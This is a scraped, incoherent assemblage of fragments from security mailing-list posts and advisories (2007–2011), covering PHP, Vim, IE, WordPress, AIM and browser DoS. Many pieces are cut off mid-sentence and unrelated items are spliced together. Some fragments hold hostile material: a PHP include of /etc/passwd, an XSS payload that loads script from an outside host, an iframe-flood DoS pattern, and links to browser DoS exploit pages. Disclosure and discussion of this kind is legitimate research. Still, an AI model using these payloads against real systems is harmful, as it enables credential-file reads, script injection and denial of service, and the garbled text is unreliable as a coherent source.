
PHP filesystem attack vectors

php -r 'include("/etc/passwd/");'

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

As you can see the file is successfully included (it works with every
single filesystem function of PHP that makes use of _php_stream_fopen()
and similar functions).

This is also part of the vector discovered by barbarianbob, while he
uses it for different purposes from what I initially thought.

Collection of Vulnerabilities in Fully Patched Vim 7.1

of ``eval'' in some other languages.  Throughout Vim, arguments passed to
``execute'' are not sanitized properly.  This can lead to arbitrary code
execution.  We will show several exploits which execute arbitrary code upon
opening a crafted file with the ex(1), vim(1), or view(1) commands.  Only in
a few cases will we explore the possibility of remote exploitation.  We will
present fixes/workarounds to some of the vulnerabilities.

The archive with code that is a part of this advisory can be found at
``http://www.rdancer.org/vulnerablevim.tar.bz2''.



Re: XSS in Internet Explorer 6 and 7

Hello Thierry!

> You're saying above that this attack works if "Initialise and script
> ActiveX control not marked as safe" is ENABLED.

This Saved XSS hole works even with this option disabled (i.e. with default
settings). But when we want to use ActiveX in our code (e.g. for a Code
Execution attack), then such a problem occurs. It's a bug in IE (when there is a
preceding comment tag), which I found when researching the possibility of making
CE via XSS in IE. So I found the workaround for this bug - to set up this

DoS vulnerabilities in Firefox, Internet Explorer, Chrome and Opera

DoS:

http://websecurity.com.ua/uploads/2010/Chrome%20&%20Opera%20DoS%20Exploit.html

This exploit for chrome protocol works in Google Chrome 1.0.154.48 and Opera
9.52.

In Chrome, blocking of the browser occurs. And in Opera, resource
consumption (CPU and memory) occurs.


[InterN0T] AMember 3.1.7 - Multiple Vulnerabilities

 -:: Ways of abusing the HTML Injection and XSS ::-
The following are examples of what you can input as first- and/or last-name:
"><SCRIPT SRC=//intern0t.net/.j>
- Works only in FireFox and NetScape 8.1-G (Gecko)

Protocol resolution in script tags. This particular variant was submitted by Łukasz Pilorz and was based
partially off of Ozh's protocol resolution bypass below. This cross site scripting example works in IE,
Netscape in IE rendering mode and Opera if you add in a </SCRIPT> tag at the end. However, this is
especially useful where space is an issue, and of course, the shorter your domain, the better. The ".j" is

Re: DoS vulnerability in Google Chrome

and Opera (http://websecurity.com.ua/3194/). Or like DoS vulnerability in
Internet Explorer 7 (http://websecurity.com.ua/2872/), which is similar to
DoS vulnerabilities in Firefox, Opera and Chrome
(http://websecurity.com.ua/2456/), all of them are printing DoS attacks.

> This will ONLY work if FireFox does NOT know which program to use.

It's interesting, because as I understand from your first information,
it works in Firefox (via Chrome), and from your previous text ("that FireFox
knows exists on the target operating system"), it must work if Firefox does
KNOW which program to use. But in your case the DoS effect is better when

Re: XSS in Internet Explorer 6 and 7

M> available on English (http://securityvulns.ru/Udocument911.html).

Referring to the above, could you briefly explain:

==============
This attack works in Internet Explorer when the option “Initialize and
script ActiveX control not marked as safe” (for Local intranet) is turned
on (Enabled or Prompt). It's such a bug in a hole of Microsoft :-) and it's a
method of bypassing the bug. This setting is needed only during an attack
via this XSS, when the JS code is placed on the same line where there is a
comment. Because if it's on another line (i.e. without a preceding comment),

Code to mitigate IE STYLE zero-day

tries to call a function (at +2Ch on IE 6, +30h on IE 7) from the
vtable.  This makes exploitability completely dependent on the
system's version of MSHTML.DLL, and all but rules out successful
exploitation in 64-bit Internet Explorer.

The mitigation works by replacing one function pointer in the vtable
with a pointer for which the low 2 bytes are 0xCCCC, but at which the
code is functionally equivalent.  Legitimate virtual function calls
will work as usual, while exploitation attempts will arrive at EIP =
0xCCCCxxxx (not exploitable) rather than 0xyyyyxxxx (exploitable for
some yyyy).

Re: DoS vulnerabilities in Firefox, Internet Explorer, Chrome, Opera and other browsers

> attacks. But mostly browser developers ignore fixing these issues.
>
> But in this case it's not only an attack on browsers, but on the whole user's
> computer - because it's blocking of the whole computer and full resource
> consumption. Which is working in many browsers, including their latest
> versions. So browser developers, with their neglect of this problem, make
> possible attacks on the whole users' systems. It was one of the leitmotifs of my
> advisory.
>

Re: DoS vulnerabilities in Firefox, Internet Explorer, Chrome, Opera and other browsers

Dangers of DoS attacks on browsers and Dangers of resource consumption DoS
attacks. But mostly browser developers ignore fixing these issues.

But in this case it's not only an attack on browsers, but on the whole user's
computer - because it's blocking of the whole computer and full resource
consumption. Which is working in many browsers, including their latest
versions. So browser developers, with their neglect of this problem, make
possible attacks on the whole users' systems. It was one of the leitmotifs of my
advisory.

> can I respectfully ask that you give vendors time to respond before

CORE-2009-0803: Virtual PC Hypervisor Memory Protection Vulnerability

5. *Non-vulnerable packages*

   . Microsoft virtualization products that are based on Hyper-V technology.


6. *Vendor Information, Solutions and Workarounds*

This issue was reported to Microsoft in August 2009. The vendor has
acknowledged the report and after extensive analysis indicated that it
plans to solve the problem in future updates to the associated products.


Re: [Full-disclosure] Remote Desktop Command Fixation Attacks

maybe I am making a huge mistake by responding to your message, but
let's see. This is what I think about security in depth in a bit more
detail.

Let's say that we have a wireless network which is guarded by "security
in depth" network administrators. The first thing they will do is to
secure the actual network by some massive segmentation exercises...
then the connection with enhanced privacy/encryption schemes (WPA2).
They will put more layers on top of that. For example, the users
need to authenticate with client-side certificates. Now the network

Re: WordPress 2.8.5 Unrestricted File Upload Arbitrary PHP Code Execution

Hi,
Just wanted to add a quick update on affected systems since I forgot to mention web servers along with WordPress versions in my advisory.
Some people are wondering why the vulnerability doesn't work on their system.

I'm pretty sure that the exploit won't work on web servers other than Apache (as they probably won't process extensions other than the last one). So non-Apache-based servers are probably safe here.
Whether it will work on your Apache server or not depends on your mod_php configuration.
The exploit won't work on servers where PHP script handling has been configured as follows:

<FilesMatch \.php$>
    SetHandler application/x-httpd-php
</FilesMatch>

Re: Ra-Guard evasion (new Internet-Drafts)

> So you say you discovered this issue as
> well and you informed vendors, but the only vendor who really has RA
> support so far is Cisco, and they did not know.

We had worked on this thing for a while. IIRC, I talked with a few guys
about this in November 2010 or so (including, IIRC, some guys involved
in NDPMon)-- For instance, I posted on the ipv6ops mailing-list (in
November/December 2010) a few comments noting that RA-Guard could be evaded.

(And, FWIW, vendors have been sitting on a number of other ND issues

Re: [Full-disclosure] COM Server-Based Binary Planting ProofOfConcept

You really should stop talking about exploits against Powerpoint etc.
As long as I can make an .exe that visually looks pixel for pixel like
a .ppt, the security model you imagine (that the desktop can
differentiate between code execution and document editing) doesn't
exist.  This work is better, if incomplete.

On Thu, Jun 2, 2011 at 9:32 AM, Mitja Kolsek <mitja.kolsek@acros.si> wrote:
>
> Thor, the "Online Proof of Concept" section of the blog post points you to a *remote*
> exploit (without any warning) but let me repeat the link here:

Re: [Full-disclosure] COM Server-Based Binary Planting ProofOfConcept

don't stop loading DLLs from arbitrary folders. So double-clicking on
a .ppt lookalike executable would be blocked, but a malicious DLL next
to a real .ppt file wouldn't be. But again, no idea as to how many/few
computers use this protection.

> This work is better, if incomplete.

Security research is never complete, so we settle for constant improvement.

Cheers,
Mitja

iDefense Security Advisory 02.12.08: Microsoft Office Works Converter Heap Overflow Vulnerability

http://labs.idefense.com/intelligence/vulnerabilities/
Feb 12, 2008

I. BACKGROUND

Microsoft Works is a word processor created by Microsoft in the 1980s.
Microsoft Office, a widely used productivity suite, is distributed with
converters for various versions of the Works file format.

II. DESCRIPTION


Re: DoS vulnerabilities in Firefox, Internet Explorer, Chrome and Opera

I would be happy to wait for patches from browser vendors, but as I already
told you in detail, it's not possible due to the behavior of browser vendors.
They all mostly ignore such holes, they all don't count DoS as
vulnerabilities, they call them "stability issues" and so don't attend to
them seriously (and don't fix them, or fix them slowly). I don't respect such a
statement as "stability issues" for DoS holes, and during 2008-2010 I worked
hard to change vendors' minds on this issue, but they still ignore it.

Also, as I already told you, they never said whether they fixed such holes or not
(especially taking into account that they almost always ignore my letters
with such holes or, as Opera did a few times, answering with "it's stability

Re: 3rd party patch for XP for MS09-048?

Protect to 2 for the best protection against SYN attacks. This value
adds additional delays to connection indications, and TCP connection
requests quickly timeout when a SYN attack is in progress. This
parameter is the recommended setting.

NOTE: The following socket options no longer work on any socket when you
set the SynAttackProtect value to 2: Scalable windows

-----

IIRC? This is called the "Silly Window Syndrome", & this is a way, in 

CORE-2007-0817: Remote Command execution, HTML and JavaScript injection vulnerabilities in AOL's Instant Messaging software

new technology also developed by AOL and available for the public in the
form of a "light IM client".

A vulnerability was discovered in these three popular versions of AOL
Instant Messaging software, AIM 6.1 (and 6.2 beta), AIM Pro and AIM Lite,
which exposes workstations running the IM clients and their users to
several immediate high-risk attack vectors. To support rendering of HTML
content, the vulnerable IM clients use an embedded Internet Explorer
server control. Unfortunately they do not properly sanitize the
potentially malicious input content to be rendered and, as a result, an
attacker might provide malicious HTML content as part of an IM message to

ACSAC 2009 submissions due June 8 and June 10 (extended)

----------------------------------------------------------------------------------------------------------------
ACSAC 2009: Deadline extended (panels June 10; papers, case studies, workshops, tutorials: June 8)
----------------------------------------------------------------------------------------------------------------

25th Annual Computer Security Applications Conference (ACSAC)
December 7-11, 2009
Honolulu, Hawaii

CALL FOR PARTICIPATION: SUBMISSION DEADLINE EXTENDED
Our website is now open for submissions: http://www.acsac.org

RE: Remote Desktop Command Fixation Attacks

"..I am not planning to support my argument in any way.."
That's a shame.
If you can prove your hypothesis, it lends credibility to your claims.
A refusal to do so only weakens your position.

As others have pointed out, your attack only works if security in depth has been blatantly, intentionally ignored.
I'll grant that it's an interesting methodology, but it assumes too much and ultimately fails to prove your claims.

You're absolutely correct; "Security in depth" is a process; no one has argued this.
What no one has stated is that security in depth has an endpoint.
Not only does it require proper analysis, planning and deployment, it's greatly weakened without constant monitoring and adjustment to meet new threats.

Re[3]: DoS vulnerabilities in Firefox, Internet Explorer, Chrome, Opera and other browsers

Don't worry about how bad guys will be placing JS code or a page with
iframes at a web site for this attack - it'll be their own problem. And if
they want, they will do it. And after they have placed the attacking code (JS or HTML)
on the target site, then it'll already be a problem for the users of this site (who
will not be able to work with it) and the admin of the site (who, in addition to
problems with working with the site, will also be left without visitors on his
site). There are always vulnerabilities on different sites which can be used
for this attack. And also the e-mail vector mentioned by Vladimir can be used.

> Its called the "infinite loop".

Re: DoS vulnerabilities in Firefox, Internet Explorer, Chrome and Opera

Some last specifics (mostly reiterating what I said in my earlier posts) -
1. You can take this issue up with the content aggregators (CDN etc) and/or
website programmers; this is not an issue to be addressed by the web browsers
because the solution to it remains imperfect in theory (one of my posts has
a 'workaround'...maybe a 'good to have' feature which WILL open up another
can of worms...).
2. Now the even vaguer non-scripted issue which you insist upon - If you are
trying to say that 1000 lines of <iframe src='nntp:something'/> (which are
executed sequentially by any JVM as a fact) is an 'exploit' and 'security
vulnerability', isn't there a HUGE point missing?

DoS vulnerabilities in Firefox, Internet Explorer, Chrome, Opera and other browsers

And as I checked on 16.05.2010, the web browsers Firefox 3.0.19 and Opera 9.52
are vulnerable to this vulnerability. And I created an exploit for conducting
a DoS attack on Firefox.

Also I found the possibility to open the email client via iframe with a mailto: URL.
Which works in the browsers Firefox 3.0.19, IE6, IE8 and Chrome. And I created
an exploit for conducting an attack on all browsers, which I called DoS via
email. This attack can be conducted both with JS and without it (via
creating a page with a large quantity of iframes).

If attack via images at a page (which open email client) is only discomfort,

Re: [Suspected Spam]DoS vulnerabilities in Firefox, Internet Explorer, Chrome and Opera

> DoS:
>
> http://websecurity.com.ua/uploads/2010/Firefox,%20IE,%20Chrome%20&%20Opera%20DoS%20Exploit2.html
>
>
> This exploit for news protocol works in Mozilla Firefox 3.0.19 (and besides
> previous versions, it must work in 3.5.x and 3.6.x), Internet Explorer 6
> (6.0.2900.2180), Internet Explorer 8 (8.0.7600.16385), Google Chrome
> 1.0.154.48 and Opera 9.52.
>

[Suspected Spam]DoS vulnerabilities in Firefox, Internet Explorer, Chrome and Opera

DoS:

http://websecurity.com.ua/uploads/2010/Firefox,%20IE,%20Chrome%20&%20Opera%20DoS%20Exploit2.html

This exploit for news protocol works in Mozilla Firefox 3.0.19 (and besides
previous versions, it must work in 3.5.x and 3.6.x), Internet Explorer 6
(6.0.2900.2180), Internet Explorer 8 (8.0.7600.16385), Google Chrome
1.0.154.48 and Opera 9.52.

In all mentioned browsers, blocking and overloading of the system occurs from

Call for Papers -- BADGERS 2011

Call For Papers -- BADGERS 2011

=============================================

The Program Committee for the first EuroSys Workshop on Building
Analysis Datasets and Gathering Experience Returns for Security (BADGERS)
invites you to submit your work. 
Paper submissions are due January 31, 2011, 11:59 p.m. PST.

More information about the workshop can be found at:

[security bulletin] HPSBUX02249 SSRT071442 rev.2 - HP-UX Running the Ignite-UX or the DynRootDisk (DRD) get_system_info Command, Local Unqualified Configuration Change

Potential Security Impact: Local unqualified configuration change 

Source: Hewlett-Packard Company, HP Software Security Response Team

VULNERABILITY SUMMARY
A potential security vulnerability has been identified in HP-UX running the Ignite-UX or the DynRootDisk (DRD) get_system_info command. This command can change system networking parameters without notification.

References: none 

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
HP-UX B.11.11, B.11.23, B.11.31 running the Ignite-UX vC.7.0, vC.7.1, vC.7.2, vC.7.3 or the DynRootDisk (DRD) vA.1.0.16.417, vA.1.0.18.245, vA.1.1.0.344, vA.2.0.0.592 get_system_info command.

Re: DoS vulnerabilities in Firefox, Internet Explorer, Chrome, Opera and other browsers

> conducting
> a DoS attack on Firefox.
>
> Also I found the possibility to open the email client via iframe with a mailto:
> URL.
> Which works in the browsers Firefox 3.0.19, IE6, IE8 and Chrome. And I
> created
> an exploit for conducting an attack on all browsers, which I called DoS via
> email. This attack can be conducted both with JS and without it (via
> creating a page with a large quantity of iframes).
>

Copyright © 1995-2012 LinuxRocket.net. All rights reserved.